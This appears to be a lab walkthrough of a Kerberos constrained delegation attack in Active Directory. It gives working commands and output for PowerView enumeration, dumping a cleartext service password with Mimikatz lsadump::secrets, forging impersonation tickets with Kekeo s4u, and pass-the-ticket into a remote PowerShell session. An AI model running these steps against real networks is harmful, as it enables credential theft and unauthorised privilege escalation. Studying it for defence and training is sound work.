Kerberos Delegation
Kerberos Delegation
allows an Application to access Resources hosted on a different Server.
An example of this would be a Web Server that needs to access a SQL Database Hosted on the Database Server for the Web Application that it is Hosting.
Once a User logs into the Web Application, the Service Account will request access to the Database on behalf of that User. This means that the User would only be able to Access Data in the Database that they have the relevant Permission for without having to provide any Database Privileges or Permissions to the Service Account itself.
Constrained Delegation Exploitation
We are on the ADOBE-PC Machine with Tier 2 Admin Privileges. Our Goal is to Escalate our Privileges to Tier 1 Admin and Access the ADOBE-SERVER Machine.
PowerView
can be used to Enumerate Available Delegations. We can see that the svcIIS Account can Delegate the HTTP and WSMAN Services on ADOBE-SERVER.
- Import
- Enumerate
- Output
# Sets Execution Policies for Windows Computers
# [Bypass] Nothing is Blocked and there are no Warnings or Prompts
Set-ExecutionPolicy Bypass -Scope process -Force
# Import the Powershell Script
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
UserPrincipalName : svcIIS@za.adobe.loc
Name : IIS Server
SamAccountName : svcIIS
MSDS-AllowedToDelegateTo : {WSMAN/ADOBE-SERVER.za.adobe.loc, WSMAN/ADOBE-SERVER, http/ADOBE-SERVER.za.adobe.loc, http/ADOBE-SERVER}
Mimikatz - Dumping LSASecrets
Administrators
With Administrative Access, we can dump LSASecrets
, part of the Windows Registry Hive where Credentials are stored for features such as Windows Services.
- Mimikatz
- Output
:: To Dump the Secrets from the Registry Hive, we need to Impersonate the SYSTEM User
token::elevate
:: Mimikatz Interacts with the Registry Hive to pull the Clear Text Credentials
lsadump::secrets
Domain : ADOBE-PC
SysKey : a1403e57976b472bce5f231922ca3942
Secret : _SC_AdobeWinAuth / service 'AdobeWinAuth' with username : svcIIS@za.adobe.loc
cur/text: Password1@
Kekeo
Now that we have Access to the Password associated with the svcIIS Account, we can perform a Kerberos Delegation Attack.
:: [User] - The User who has the Constrained Delegation Permissions.
:: [Domain] - The Domain that we are Attacking since Kekeo can be used to forge Tickets to abuse Cross-Forest Trust.
:: [Password] - The Password Associated with the svcIIS Account.
tgt::ask /user:svcIIS /domain:za.adobe.loc /password:Password1@
Now that we have the TGT for the Account that can perform Delegation, we can forge TGS Requests for the Account we want to Impersonate. We need to perform this for both HTTP and WSMAN to allow us to create a PSSession on ADOBE-SERVER.
- Kekeo
- Output
:: [TGT] - We provide the TGT that we Generated in the Previous Step.
:: [User] - The User we want to Impersonate. Since t2_ accounts have Administrative Access over Workstations, it is a safe assumption that t1_ Accounts will have Administrative Access over Servers.
:: [Service] - The Services we want to Impersonate using Delegation. We first generate a TGS for the HTTP Service. Then we can rerun the same Command for the WSMAN Service.
tgs::s4u /tgt:TGT_svcIIS@ZA.adobe.LOC_krbtgt~za.adobe.loc@ZA.adobe.LOC.kirbi /user:t1_trevor.jones /service:http/ADOBE-SERVER.za.adobe.loc
tgs::s4u /tgt:TGT_svcIIS@ZA.adobe.LOC_krbtgt~za.adobe.loc@ZA.adobe.LOC.kirbi /user:t1_trevor.jones /service:wsman/ADOBE-SERVER.za.adobe.loc
Service(s):
[s4u2proxy] http/ADOBE-SERVER.za.adobe.loc
> Ticket in file 'TGS_t1_trevor.jones@ZA.adobe.LOC_http~ADOBE-SERVER.za.adobe.loc@ZA.adobe.LOC.kirbi'
[...]
Service(s):
[s4u2proxy] wsman/ADOBE-SERVER.za.adobe.loc
> Ticket in file 'TGS_t1_trevor.jones@ZA.adobe.LOC_wsman~ADOBE-SERVER.za.adobe.loc@ZA.adobe.LOC.kirbi'
Mimikatz - Importing TGS Tickets
privilege::debug
:: Importing the Extracted Tickets
:: [HTTP]
kerberos::ptt TGS_t1_trevor.jones@ZA.adobe.LOC_http~ADOBE-SERVER.za.adobe.loc@ZA.adobe.LOC.kirbi
:: [WSMAN]
kerberos::ptt TGS_t1_trevor.jones@ZA.adobe.LOC_wsman~ADOBE-SERVER.za.adobe.loc@ZA.adobe.LOC.kirbi
Using The Ticket
We can Verify that the Tickets were correctly Imported using the Windows Built-In Command.
- List Injected Tickets
- Create PSH Session
:: Displays a list of currently Cached Kerberos Tickets
klist
Now we can create a Powershell Session on ADOBE-SERVER.
# Creates a Persistent Connection to a Local or Remote Computer
New-PSSession -ComputerName ADOBE-SERVER.za.adobe.loc
# Starts an Interactive Session with a Remote Computer
Enter-PSSession -ComputerName ADOBE-SERVER.za.adobe.loc